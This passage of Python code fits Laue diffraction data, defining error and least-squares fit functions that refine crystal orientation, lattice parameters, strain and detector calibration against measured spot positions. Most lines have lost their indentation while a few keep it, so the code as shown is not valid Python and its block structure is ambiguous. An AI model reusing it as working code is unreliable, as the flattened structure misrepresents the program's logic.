Xexp = pixX[grain_index]
Yexp = pixY[grain_index]
distanceterm = np.sqrt((Xmodel - Xexp) ** 2 + (Ymodel - Yexp) ** 2)
if weights is not None:
allweights = np.sum(weights[grain_index])
distanceterm = distanceterm * weights[grain_index] / allweights
# if verbose:
# print("** grain %d distance residues = " % grain_index,
# distanceterm, " ********")
# print("** grain %d mean distance residue = " % grain_index,
# np.mean(distanceterm), " ********")
# print "twthe, chi", twthe, chi
distances_vector_list.append(distanceterm)
# print 'len(distances_vector_list)', len(distances_vector_list)
    if nb_grains == 2:
        alldistances_array = np.hstack((distances_vector_list[0], distances_vector_list[1]))
    elif nb_grains == 1:
        alldistances_array = distances_vector_list[0]
if verbose:
pass
# if weights is not None:
# print("***********mean weighted pixel deviation ",
# np.mean(alldistances_array), " ********")
# else:
# print("***********mean pixel deviation ",
# np.mean(alldistances_array), " ********")
# print "newmatrix", newmatrix
if returnalldata:
# concatenated all pairs distances, all UB matrices, all UB.B0matrix matrices
return alldistances_array, all_deltamatrices, all_newmatrices
else:
return alldistances_array
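# Sanity-check sketch (hedged, illustrative angles): for small rotations the
# combined delta matrix mat3 . mat2 . mat1 built above stays close to identity.
def _demo_deltamat_small_angles(angles_deg=(0.1, -0.05, 0.2)):
    a1, a2, a3 = np.array(angles_deg) * DEG
    mat1 = np.array([[np.cos(a1), 0, np.sin(a1)], [0, 1, 0], [-np.sin(a1), 0, np.cos(a1)]])
    mat2 = np.array([[1, 0, 0], [0, np.cos(a2), np.sin(a2)], [0, -np.sin(a2), np.cos(a2)]])
    mat3 = np.array([[np.cos(a3), -np.sin(a3), 0], [np.sin(a3), np.cos(a3), 0], [0, 0, 1]])
    deltamat = np.dot(mat3, np.dot(mat2, mat1))
    return np.allclose(deltamat, np.eye(3), atol=np.radians(0.5))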
def error_function_general(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
returnalldata=False):
"""
q = T_LT UzUyUz Ustart T_c B0 G*
Interface error function to return array of pair (exp. - model) distances
Sum_i [weights_i((Xmodel_i-Xexp_i)**2+(Ymodel_i-Yexp_i)**2) ]
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
q = T_LT UzUyUz Ustart T_c B0 G*
B0 reference structure reciprocal space frame (a*,b*,c*) a* // ki b* perp to a* and perp to z (z belongs to the plane of ki and detector normal vector n)
i.e. columns of B0 are components of a*,b* and c* expressed in x,y,z LT frame
possible keys for parameters to be refined are:
five detector frame calibration parameters:
detectordistance,xcen,ycen,beta, gamma
three misorientation angles with respect to LT orthonormal frame (x, y, z) matrices Ux, Uy,Uz:
anglex,angley,anglez
5 independent elements of a distortion operator
-[[Tc00,Tc01,Tc02],[Tc10,Tc11,Tc12],[Tc20,Tc21,Tc22]]
each column is the transformed reciprocal unit cell vector a*',b*' or c*' expressed in a*,b*,c* frame (reference reciprocal unit cell)
Usually Tc11, Tc22, Tc01,Tc02,Tc12 with Tc00=1 and the all others = 0 (matrix triangular up)
# TODO :- [[Td00,Td01,Td02],[Td10,Td11,Td12],[Td20,Td21,Td22]]
#
#each column is the transformed direct crystal unit cell vector a',b' or c' expressed in a,b,c frame (reference unit cell)
-[[T00,T01,T02],[T10,T11,T12],[T20,T21,T22]]
each column is the transformed LT frame vector x',y' or z' expressed in x,y,z frame
-[[Ts00,Ts01,Ts02],[Ts10,Ts11,Ts12],[Ts20,Ts21,Ts22]]
each column is the transformed sample frame vector xs',ys' or zs' expressed in xs,ys,zs frame
"""
if isinstance(allparameters, np.ndarray):
calibrationparameters = (allparameters.tolist())[:5]
else:
calibrationparameters = allparameters[:5]
# print 'allparameters',allparameters
Uy, Ux, Uz = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
Tc = np.array(allparameters[8:17]).reshape((3, 3))
T = np.array(allparameters[17:26]).reshape((3, 3))
Ts = np.array(allparameters[26:35]).reshape((3, 3))
latticeparameters = np.array(allparameters[35:41])
sourcedepth = allparameters[41]
# print "Tc before", Tc
T_has_elements = False
Ts_has_elements = False
Tc_has_elements = False
latticeparameters_has_elements = False
nb_varying_parameters = len(varying_parameters_keys)
for varying_parameter_index, parameter_name in enumerate(varying_parameters_keys):
# print "varying_parameter_index,parameter_name", varying_parameter_index, parameter_name
if parameter_name in ("anglex", "angley", "anglez"):
# print "got angles!"
if nb_varying_parameters > 1:
anglevalue = (varying_parameters_values_array[varying_parameter_index] * DEG)
else:
anglevalue = varying_parameters_values_array[0] * DEG
# print "anglevalue (rad)= ",anglevalue
ca = np.cos(anglevalue)
sa = np.sin(anglevalue)
            if parameter_name == "angley":
                Uy = np.array([[ca, 0, sa], [0, 1, 0], [-sa, 0, ca]])
            elif parameter_name == "anglex":
                Ux = np.array([[1.0, 0, 0], [0, ca, sa], [0, -sa, ca]])
            elif parameter_name == "anglez":
                Uz = np.array([[ca, -sa, 0], [sa, ca, 0], [0, 0, 1.0]])
elif ((not T_has_elements) and (not Ts_has_elements) and parameter_name
in ("Tc00", "Tc01", "Tc02", "Tc10", "Tc11", "Tc12", "Tc20", "Tc21", "Tc22")):
# print 'got Tc elements: ', parameter_name
for i in list(range(3)):
for j in list(range(3)):
if parameter_name == "Tc%d%d" % (i, j):
# print "got parameter_name", parameter_name
if nb_varying_parameters > 1:
Tc[i, j] = varying_parameters_values_array[varying_parameter_index]
else:
Tc[i, j] = varying_parameters_values_array[0]
Tc_has_elements = True
elif (not Tc_has_elements and not Ts_has_elements and parameter_name
in ("T00", "T01", "T02", "T10", "T11", "T12", "T20", "T21", "T22")):
for i in list(range(3)):
for j in list(range(3)):
                    if parameter_name == "T%d%d" % (i, j):
if nb_varying_parameters > 1:
T[i, j] = varying_parameters_values_array[varying_parameter_index]
else:
T[i, j] = varying_parameters_values_array[0]
T_has_elements = True
elif (not Tc_has_elements and not T_has_elements and parameter_name
in ("Ts00", "Ts01", "Ts02", "Ts10", "Ts11", "Ts12", "Ts20", "Ts21", "Ts22")):
for i in list(range(3)):
for j in list(range(3)):
                    if parameter_name == "Ts%d%d" % (i, j):
if nb_varying_parameters > 1:
Ts[i, j] = varying_parameters_values_array[varying_parameter_index]
else:
Ts[i, j] = varying_parameters_values_array[0]
Ts_has_elements = True
elif parameter_name in ("a", "b", "c", "alpha", "beta", "gamma"):
indparam = dict_lattice_parameters[parameter_name]
# if nb_varying_parameters > 1:
# latticeparameters[indparam] = latticeparameters[0] * np.exp(varying_parameters_values_array[varying_parameter_index] / factorscale)
# else:
# latticeparameters[indparam] = latticeparameters[0] * np.exp(varying_parameters_values_array[0] / factorscale)
if nb_varying_parameters > 1:
latticeparameters[indparam] = varying_parameters_values_array[varying_parameter_index]
else:
latticeparameters[indparam] = varying_parameters_values_array[0]
latticeparameters_has_elements = True
elif parameter_name in ("distance",):
calibrationparameters[0] = varying_parameters_values_array[varying_parameter_index]
elif parameter_name in ("xcen",):
calibrationparameters[1] = varying_parameters_values_array[varying_parameter_index]
elif parameter_name in ("ycen",):
calibrationparameters[2] = varying_parameters_values_array[varying_parameter_index]
elif parameter_name in ("beta",):
calibrationparameters[3] = varying_parameters_values_array[varying_parameter_index]
elif parameter_name in ("gamma",):
calibrationparameters[4] = varying_parameters_values_array[varying_parameter_index]
elif parameter_name in ("depth",):
sourcedepth = varying_parameters_values_array[varying_parameter_index]
Uxyz = np.dot(Uz, np.dot(Ux, Uy))
# if verbose:
# print("Uxyz", Uxyz)
# print("varying_parameters_keys", varying_parameters_keys)
# print("varying_parameters_values_array", varying_parameters_values_array)
# print("Tc_has_elements", Tc_has_elements)
# print("T_has_elements", T_has_elements)
# print("Ts_has_elements", Ts_has_elements)
# print("latticeparameters_has_elements", latticeparameters_has_elements)
# print "Tc after", Tc
# print "T", T
# print 'Ts', Ts
# DictLT.RotY40 such as X=DictLT.RotY40 Xsample (xs,ys,zs =columns expressed in x,y,z frame)
# transform in sample frame Ts
# same transform in x,y,z LT frame T
# Ts = DictLT.RotY40-1 T DictLT.RotY40
# T = DictLT.RotY40 Ts DictLT.RotY40-1
newmatrix = np.dot(Uxyz, initrot)
if Tc_has_elements:
newmatrix = np.dot(newmatrix, Tc)
elif T_has_elements:
newmatrix = np.dot(T, newmatrix)
elif Ts_has_elements:
T = np.dot(np.dot(DictLT.RotY40, Ts), DictLT.RotYm40)
newmatrix = np.dot(T, newmatrix)
elif latticeparameters_has_elements:
B0matrix = CP.calc_B_RR(latticeparameters, directspace=1, setvolume=False)
# if verbose:
# print("newmatrix", newmatrix)
# print("B0matrix", B0matrix)
Xmodel, Ymodel, _, _ = calc_XY_pixelpositions(calibrationparameters,
Miller_indices,
absolutespotsindices,
UBmatrix=newmatrix,
B0matrix=B0matrix,
offset=sourcedepth,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
distanceterm = np.sqrt((Xmodel - Xexp) ** 2 + (Ymodel - Yexp) ** 2)
if weights is not None:
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
# if verbose:
# # print "** distance residues = " , distanceterm, " ********"
# print("** mean distance residue = ", np.mean(distanceterm), " ********")
# print "twthe, chi", twthe, chi
alldistances_array = distanceterm
if verbose:
# print "varying_parameters_values in error_function_on_demand_strain",varying_parameters_values
# print "arr_indexvaryingparameters",arr_indexvaryingparameters
# print "Xmodel",Xmodel
# print "pixX",pixX
# print "Ymodel",Ymodel
# print "pixY",pixY
# print "newmatrix",newmatrix
# print "B0matrix",B0matrix
# print "deltamat",deltamat
# print "initrot",initrot
# print "param_orient",param_calib
# print "distanceterm",distanceterm
pass
# if weights is not None:
# print("***********mean weighted pixel deviation ",
# np.mean(alldistances_array), " ********")
# else:
# print("***********mean pixel deviation ", np.mean(alldistances_array), " ********")
# print "newmatrix", newmatrix
if returnalldata:
# concatenated all pairs distances, all UB matrices, all UB.B0matrix matrices
return alldistances_array, Uxyz, newmatrix, Tc, T, Ts
else:
return alldistances_array
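# Layout sketch (hedged, illustrative values) for the allparameters vector
# consumed by error_function_general above: [0:5] detector calibration,
# [5:8] angles, [8:17] Tc, [17:26] T, [26:35] Ts (row-major 3x3 each),
# [35:41] lattice parameters, [41] source depth: 42 entries in total.
def _demo_allparameters_general(calib5, latticeparameters6):
    identity9 = [1, 0, 0, 0, 1, 0, 0, 0, 1]  # row-major 3x3 identity
    return (list(calib5) + [0, 0, 0] + identity9 + identity9 + identity9
            + list(latticeparameters6) + [0])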
def fit_function_general(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
UBmatrix_start=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
**kwd):
"""
"""
if verbose:
# print("\n\n******************\nfirst error with initial values of:",
# varying_parameters_keys, " \n\n***************************\n")
error_function_general(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
B0matrix=B0matrix,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction)
# print("\n\n********************\nFitting parameters: ",
# varying_parameters_keys, "\n\n***************************\n")
# print("With initial values", varying_parameters_values_array)
    # set the keyword defaults of error_function_general for the fit, because leastsq handles only *args, not **kwds
error_function_general.__defaults__ = (UBmatrix_start,
B0matrix,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction,
False)
# pixX = np.array(pixX, dtype=np.float64)
# pixY = np.array(pixY, dtype=np.float64)
# LEASTSQUARE
res = leastsq(error_function_general,
varying_parameters_values_array,
args=(
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
                      ),  # args must be a tuple; the trailing comma matters!
maxfev=5000,
full_output=1,
xtol=1.0e-11,
epsfcn=0.0,
**kwd)
refined_values = res[0]
# print "res fit in fit function general", res
# print("code results", res[-1])
# print("nb iterations", res[2]["nfev"])
# print("refined_values", refined_values)
if res[-1] not in (1, 2, 3, 4, 5):
return None
else:
if verbose:
# print("\n\n ************** End of Fitting - Final errors (general fit function) ****************** \n\n"
# )
alldata = error_function_general(refined_values,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
B0matrix=B0matrix,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction,
returnalldata=True)
# alldistances_array, Uxyz, newmatrix, Tc, T, Ts
alldistances_array, Uxyz, refinedUB, refinedTc, refinedT, refinedTs = alldata
# for k, param_key in enumerate(varying_parameters_keys):
# print("%s : start %.4f ---> refined %.4f"
# % (param_key, varying_parameters_values_array[k], refined_values[k]))
# print("results:\n q= refinedT UBstart refinedTc B0 G*\nq = refinedUB B0 G*")
# print("refined UBmatrix", refinedUB)
# print("Uxyz", Uxyz)
# print("refinedTc, refinedT, refinedTs", refinedTc, refinedT, refinedTs)
# print("final mean pixel residues : %f with %d spots"
# % (np.mean(alldistances_array), len(absolutespotsindices)))
return refined_values
dict_lattice_parameters = {"a": 0, "b": 1, "c": 2, "alpha": 3, "beta": 4, "gamma": 5}
def fit_function_latticeparameters(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
UBmatrix_start=IDENTITYMATRIX,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
additional_expression="none",
**kwd):
"""
fit direct (real) unit cell lattice parameters (in refinedB0)
and orientation
q = refinedUzUyUz Ustart refinedB0 G*
with error function to return array of pair (exp. - model) distances
Sum_i [weights_i((Xmodel_i-Xexp_i)**2+(Ymodel_i-Yexp_i)**2) ]
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
"""
if verbose:
# print("\n\n******************\nfirst error with initial values of:",
# varying_parameters_keys, " \n\n***************************\n",)
error_function_latticeparameters(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction,
additional_expression=additional_expression)
# print("\n\n********************\nFitting parameters: ",
# varying_parameters_keys, "\n\n***************************\n")
# print("With initial values", varying_parameters_values_array)
# print '*************** UBmatrix_start before fit************'
# print UBmatrix_start
# print '*******************************************'
    # set the keyword defaults of error_function_latticeparameters for the fit, because leastsq handles only *args, not **kwds
error_function_latticeparameters.__defaults__ = (UBmatrix_start,
pureRotation,
0,
pixelsize,
dim,
weights,
kf_direction,
False,
additional_expression)
# pixX = np.array(pixX, dtype=np.float64)
# pixY = np.array(pixY, dtype=np.float64)
# LEASTSQUARE
res = leastsq(error_function_latticeparameters,
varying_parameters_values_array,
args=(
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
                      ),  # args must be a tuple; the trailing comma matters!
maxfev=5000,
full_output=1,
xtol=1.0e-11,
epsfcn=0.0,
**kwd)
refined_values = res[0]
# print "res fit in fit function general", res
# print("code results", res[-1])
# print("nb iterations", res[2]["nfev"])
# print("refined_values", refined_values)
if res[-1] not in (1, 2, 3, 4, 5):
return None
else:
if 1:
# print(
# "\n\n ************** End of Fitting - Final errors (general fit function) ****************** \n\n"
# )
alldata = error_function_latticeparameters(refined_values,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=UBmatrix_start,
pureRotation=pureRotation,
verbose=1,
pixelsize=pixelsize,
dim=dim,
weights=weights,
kf_direction=kf_direction,
returnalldata=True,
additional_expression=additional_expression)
# alldistances_array, Uxyz, newmatrix, Tc, T, Ts
alldistances_array, Uxyz, refinedUB, refinedB0matrix, refinedLatticeparameters = (
alldata)
# print("\n--------------------\nresults:\n------------------")
# for k, param_key in enumerate(varying_parameters_keys):
# print("%s : start %f ---> refined %f"
# % (param_key, varying_parameters_values_array[k], refined_values[k]))
# print("q= refinedT UBstart refinedTc B0 G*\nq = refinedUB B0 G*")
# print("refined UBmatrix", refinedUB.tolist())
# print("Uxyz", Uxyz.tolist())
# print("refinedB0matrix", refinedB0matrix.tolist())
# print("refinedLatticeparameters", refinedLatticeparameters)
# print("final mean pixel residues : %f with %d spots"
# % (np.mean(alldistances_array), len(absolutespotsindices)))
return refined_values
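# Hedged usage sketch for the lattice-parameter fit above (illustrative
# arguments): allparameters is the 5 calibration values + 3 placeholder angles
# + the 6 lattice parameters, matching the slice allparameters[8:14] read by
# error_function_latticeparameters.
def _demo_fit_latticeparameters(calib5, latticeparameters6, miller, spots, Xexp, Yexp, UBstart):
    keys = ["anglex", "angley", "anglez", "a", "b", "c", "alpha", "beta", "gamma"]
    start = [0.0, 0.0, 0.0] + list(latticeparameters6)
    allparameters = list(calib5) + [0, 0, 0] + list(latticeparameters6)
    return fit_function_latticeparameters(start, keys, miller, allparameters,
                                          spots, Xexp, Yexp, UBmatrix_start=UBstart)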
def error_function_latticeparameters(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
returnalldata=False,
additional_expression="none"):
"""
q = UzUyUz Ustart B0 G*
Interface error function to return array of pair (exp. - model) distances
Sum_i [weights_i((Xmodel_i-Xexp_i)**2+(Ymodel_i-Yexp_i)**2) ]
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
q = refinedUzUyUz Ustart refinedB0 G*
B0 reference structure reciprocal space frame (a*,b*,c*) a* // ki b* perp to a* and perp to z (z belongs to the plane of ki and detector normal vector n)
i.e. columns of B0 are components of a*,b* and c* expressed in x,y,z LT frame
refinedB0 is obtained by refining the 5 /6 lattice parameters
possible keys for parameters to be refined are:
five detector frame calibration parameters:
det_distance,det_xcen,det_ycen,det_beta, det_gamma
three misorientation angles with respect to LT orthonormal frame (x, y, z) matrices Ux, Uy,Uz:
anglex,angley,anglez
5 lattice parameters among 6 (a,b,c,alpha, beta,gamma)
"""
# reading default parameters
# CCD plane calibration parameters
if isinstance(allparameters, np.ndarray):
calibrationparameters = (allparameters.tolist())[:5]
else:
calibrationparameters = allparameters[:5]
# allparameters[5:8] = 0,0,0
Uy, Ux, Uz = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
latticeparameters = np.array(allparameters[8:14])
nb_varying_parameters = len(varying_parameters_keys)
# factorscale = 1.
for varying_parameter_index, parameter_name in enumerate(varying_parameters_keys):
# print "varying_parameter_index,parameter_name", varying_parameter_index, parameter_name
if parameter_name in ("anglex", "angley", "anglez"):
# print "got angles!"
if nb_varying_parameters > 1:
anglevalue = varying_parameters_values_array[varying_parameter_index] * DEG
else:
anglevalue = varying_parameters_values_array[0] * DEG
# print "anglevalue (rad)= ",anglevalue
ca = np.cos(anglevalue)
sa = np.sin(anglevalue)
            if parameter_name == "angley":
                Uy = np.array([[ca, 0, sa], [0, 1, 0], [-sa, 0, ca]])
            elif parameter_name == "anglex":
                Ux = np.array([[1.0, 0, 0], [0, ca, sa], [0, -sa, ca]])
            elif parameter_name == "anglez":
                Uz = np.array([[ca, -sa, 0], [sa, ca, 0], [0, 0, 1.0]])
elif parameter_name in ("alpha", "beta", "gamma"):
# print 'got Tc elements: ', parameter_name
indparam = dict_lattice_parameters[parameter_name]
# if nb_varying_parameters > 1:
# latticeparameters[indparam] = latticeparameters[3] * np.exp(varying_parameters_values_array[varying_parameter_index] / factorscale)
# else:
# latticeparameters[indparam] = latticeparameters[3] * np.exp(varying_parameters_values_array[0] / factorscale)
if nb_varying_parameters > 1:
latticeparameters[indparam] = varying_parameters_values_array[varying_parameter_index]
else:
latticeparameters[indparam] = varying_parameters_values_array[0]
elif parameter_name in ("a", "b", "c"):
# print 'got Tc elements: ', parameter_name
indparam = dict_lattice_parameters[parameter_name]
# if nb_varying_parameters > 1:
# latticeparameters[indparam] = latticeparameters[0] * np.exp(varying_parameters_values_array[varying_parameter_index] / factorscale)
# else:
# latticeparameters[indparam] = latticeparameters[0] * np.exp(varying_parameters_values_array[0] / factorscale)
if nb_varying_parameters > 1:
latticeparameters[indparam] = varying_parameters_values_array[varying_parameter_index]
else:
latticeparameters[indparam] = varying_parameters_values_array[0]
Uxyz = np.dot(Uz, np.dot(Ux, Uy))
if additional_expression == "a==b":
indparam = dict_lattice_parameters["b"]
indparam1 = dict_lattice_parameters["a"]
latticeparameters[indparam] = latticeparameters[indparam1]
newB0matrix = CP.calc_B_RR(latticeparameters, directspace=1, setvolume=False)
# if verbose:
# print("\n-------\nvarying_parameters_keys", varying_parameters_keys)
# print("varying_parameters_values_array", varying_parameters_values_array)
# print("Uxyz", Uxyz)
# print("latticeparameters", latticeparameters)
# print("newB0matrix", newB0matrix)
# DictLT.RotY40 such as X=DictLT.RotY40 Xsample (xs,ys,zs =columns expressed in x,y,z frame)
# transform in sample frame Ts
# same transform in x,y,z LT frame T
# Ts = DictLT.RotY40-1 T DictLT.RotY40
# T = DictLT.RotY40 Ts DictLT.RotY40-1
newmatrix = np.dot(Uxyz, initrot)
# if 0: # verbose:
# print("initrot", initrot)
# print("newmatrix", newmatrix)
Xmodel, Ymodel, _, _ = calc_XY_pixelpositions(calibrationparameters,
Miller_indices,
absolutespotsindices,
UBmatrix=newmatrix,
B0matrix=newB0matrix,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
if 0: # verbose:
print("Xmodel, Ymodel", Xmodel, Ymodel)
if 0: # verbose:
print("Xexp, Yexp", Xexp, Yexp)
distanceterm = np.sqrt((Xmodel - Xexp) ** 2 + (Ymodel - Yexp) ** 2)
if weights is not None:
allweights = np.sum(weights)
distanceterm = distanceterm * weights / allweights
# if verbose:
# # print "** distance residues = " , distanceterm, " ********"
# print("** mean distance residue = ", np.mean(distanceterm), " ********")
# print "twthe, chi", twthe, chi
alldistances_array = distanceterm
if verbose:
# print "varying_parameters_values in error_function_on_demand_strain",varying_parameters_values
# print "arr_indexvaryingparameters",arr_indexvaryingparameters
# print "Xmodel",Xmodel
# print "pixX",pixX
# print "Ymodel",Ymodel
# print "pixY",pixY
# print "newmatrix",newmatrix
# print "newB0matrix",newB0matrix
# print "deltamat",deltamat
# print "initrot",initrot
# print "param_orient",param_calib
# print "distanceterm",distanceterm
pass
# if weights is not None:
# print("***********mean weighted pixel deviation ",
# np.mean(alldistances_array), " ********")
# else:
# print(
# "***********mean pixel deviation ", np.mean(alldistances_array),
# " ********")
# print "newmatrix", newmatrix
if returnalldata:
# concatenated all pairs distances, all UB matrices, all UB.newB0matrix matrices
return alldistances_array, Uxyz, newmatrix, newB0matrix, latticeparameters
else:
return alldistances_array
def error_function_strain(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
initrot=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
returnalldata=False):
"""
q = refinedStrain refinedUzUyUz Ustart B0 G*
Interface error function to return array of pair (exp. - model) distances
Sum_i [weights_i((Xmodel_i-Xexp_i)**2+(Ymodel_i-Yexp_i)**2) ]
Xmodel,Ymodel comes from G*=ha*+kb*+lc*
B0 reference structure reciprocal space frame (a*,b*,c*) a* // ki b* perp to a* and perp to z (z belongs to the plane of ki and detector normal vector n)
i.e. columns of B0 are components of a*,b* and c* expressed in x,y,z LT frame
    Strain of reciprocal vectors: 6 components of an upper-triangular matrix ( T00 T01 T02)
                                                                              (  0  T11 T12)
                                                                              (  0   0  T22)
    one element must be fixed (usually T00 = 1)
Algebra:
X=PX' e'1 e'2 e'3
| | |
v v v
e1 ( . . . )
P= e2 ( . . . )
e3 ( . . . )
If A transform expressed in (e1,e2,e3) basis
and A' same transform but expressed in (e'1,e'2,e'3) basis
then A'=P-1 A P
X_LT=P X_sample
P=(cos40, 0 -sin40)
(0 1 0 )
(sin40 0 cos40)
Strain_sample=P-1 Strain_LT P
Strain_LT = P Strain_Sample P-1
"""
# reading default parameters
# CCD plane calibration parameters
if isinstance(allparameters, np.ndarray):
calibrationparameters = (allparameters.tolist())[:5]
else:
calibrationparameters = allparameters[:5]
# print 'calibrationparameters', calibrationparameters
# allparameters[5:8] = 0,0,0
Uy, Ux, Uz = IDENTITYMATRIX, IDENTITYMATRIX, IDENTITYMATRIX
straincomponents = np.array(allparameters[8:14])
Ts = np.array([straincomponents[:3],
[0.0, straincomponents[3], straincomponents[4]],
[0, 0, straincomponents[5]]])
# print 'Ts before', Ts
nb_varying_parameters = len(varying_parameters_keys)
for varying_parameter_index, parameter_name in enumerate(varying_parameters_keys):
# print "varying_parameter_index,parameter_name", varying_parameter_index, parameter_name
if parameter_name in ("anglex", "angley", "anglez"):
# print "got angles!"
if nb_varying_parameters > 1:
anglevalue = varying_parameters_values_array[varying_parameter_index] * DEG
else:
anglevalue = varying_parameters_values_array[0] * DEG
# print "anglevalue (rad)= ",anglevalue
ca = np.cos(anglevalue)
sa = np.sin(anglevalue)
            if parameter_name == "angley":
                Uy = np.array([[ca, 0, sa], [0, 1, 0], [-sa, 0, ca]])
            elif parameter_name == "anglex":
                Ux = np.array([[1.0, 0, 0], [0, ca, sa], [0, -sa, ca]])
            elif parameter_name == "anglez":
                Uz = np.array([[ca, -sa, 0], [sa, ca, 0], [0, 0, 1.0]])
elif parameter_name in ("Ts00", "Ts01", "Ts02", "Ts11", "Ts12", "Ts22"):
# print 'got Ts elements: ', parameter_name
for i in list(range(3)):
for j in list(range(3)):
if parameter_name == "Ts%d%d" % (i, j):
# print "got parameter_name", parameter_name
if nb_varying_parameters > 1:
Ts[i, j] = varying_parameters_values_array[varying_parameter_index]
else:
Ts[i, j] = varying_parameters_values_array[0]
# print 'Ts after', Ts
Uxyz = np.dot(Uz, np.dot(Ux, Uy))
newmatrix = np.dot(Uxyz, initrot)
# print 'Uxyz', Uxyz
# print 'newmatrix', newmatrix
# DictLT.RotY40 such as X=DictLT.RotY40 Xsample (xs,ys,zs =columns expressed in x,y,z frame)
# transform in sample frame Ts
# same transform in x,y,z LT frame T
# Ts = DictLT.RotY40-1 T DictLT.RotY40
# T = DictLT.RotY40 Ts DictLT.RotY40-1
T = np.dot(np.dot(DictLT.RotY40, Ts), DictLT.RotYm40)
# T = np.dot(np.dot(DictLT.RotYm40, Ts), DictLT.RotY40)
# print 'T', T
newmatrix = np.dot(T, newmatrix)
if 0: # verbose:
print("initrot", initrot)
print("newmatrix", newmatrix)
print("Miller_indices", Miller_indices)
print("absolutespotsindices", absolutespotsindices)
Xmodel, Ymodel, _, _ = calc_XY_pixelpositions(calibrationparameters,
Miller_indices,
absolutespotsindices,
UBmatrix=newmatrix,
B0matrix=B0matrix,
pureRotation=0,
labXMAS=0,
verbose=0,
pixelsize=pixelsize,
dim=dim,
kf_direction=kf_direction)
distanceterm = np.sqrt((Xmodel - Xexp) ** 2 + (Ymodel - Yexp) ** 2)
    # note: a membership test (`in`) with a numpy weights array is ambiguous,
    # so the sentinel values are checked explicitly
    if weights is not None and weights is not False and str(weights) not in ("None", "False", "0"):
        allweights = np.sum(weights)
        distanceterm = distanceterm * weights / allweights
# if verbose:
# # print "** distance residues = " , distanceterm, " ********"
# print("** mean distance residue = ", np.mean(distanceterm), " ********")
# print "twthe, chi", twthe, chi
alldistances_array = distanceterm
if verbose:
# print "varying_parameters_values in error_function_on_demand_strain",varying_parameters_values
# print "arr_indexvaryingparameters",arr_indexvaryingparameters
# print "Xmodel",Xmodel
# print "pixX",pixX
# print "Ymodel",Ymodel
# print "pixY",pixY
# print "newmatrix",newmatrix
# print "newB0matrix",newB0matrix
# print "deltamat",deltamat
# print "initrot",initrot
# print "param_orient",param_calib
# print "distanceterm",distanceterm
pass
# if weights is not None:
# print("***********mean weighted pixel deviation ",
# np.mean(alldistances_array), " ********")
# else:
# print("***********mean pixel deviation ",
# np.mean(alldistances_array), " ********")
# print "newmatrix", newmatrix
if returnalldata:
# concatenated all pairs distances, all UB matrices, all UB.newB0matrix matrices
return alldistances_array, Uxyz, newmatrix, Ts, T
else:
return alldistances_array
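# Hedged sketch of the sample-to-lab frame change used above: per the docstring
# algebra, Strain_LT = P Strain_sample P^-1 with P a rotation about y;
# DictLT.RotY40 and DictLT.RotYm40 are assumed to be that +40 deg rotation and
# its inverse.
def _demo_sample_to_lab(Ts):
    P = DictLT.RotY40      # assumed +40 deg rotation about y
    Pinv = DictLT.RotYm40  # assumed inverse (-40 deg)
    return np.dot(np.dot(P, Ts), Pinv)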
def fit_function_strain(varying_parameters_values_array,
varying_parameters_keys,
Miller_indices,
allparameters,
absolutespotsindices,
Xexp,
Yexp,
UBmatrix_start=IDENTITYMATRIX,
B0matrix=IDENTITYMATRIX,
nb_grains=1,
pureRotation=0,
verbose=0,
pixelsize=165.0 / 2048,
dim=(2048, 2048),
weights=None,
kf_direction="Z>0",
**kwd):
"""
fit strain components in sample frame
and orientation
q = refinedT refinedUzUyUz Ustart refinedB0 G*
with error function to return array of pair (exp. - model) distances
Sum_i [weights_i((Xmodel_i-Xexp_i)**2+(Ymodel_i-Yexp_i)**2) ]
